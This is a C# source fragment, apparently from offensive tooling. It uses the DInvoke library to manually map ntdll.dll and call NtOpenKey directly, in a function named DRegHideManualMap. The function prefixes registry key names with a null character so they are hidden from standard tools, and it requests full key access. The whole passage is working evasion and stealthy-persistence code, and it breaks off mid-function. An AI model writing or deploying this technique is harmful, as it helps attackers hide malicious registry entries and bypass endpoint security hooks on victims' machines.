public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
object[] funcargs =
{
keyHandle, desiredAccess, objectAttributes
};
DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
keyHandle = (IntPtr)funcargs[0];
return(retvalue);
}
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");
try
{
if (hive == "HKLM")
{
hive = @"\Registry\Machine";
}
else if (hive == "HKCU")
{
String sid = WindowsIdentity.GetCurrent().User.ToString();
hive = @"\Registry\User\" + sid;
}
else
{
throw new Exception("Hive needs to be either HKLM or HKCU");
}
if (hiddenKey)
{
keyName = "\0" + keyName;
}
String regKey = hive + subKey;
IntPtr keyHandle = IntPtr.Zero;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
string SID = WindowsIdentity.GetCurrent().User.ToString();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
ref IntPtr rkeyHandle = ref keyHandle;
STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
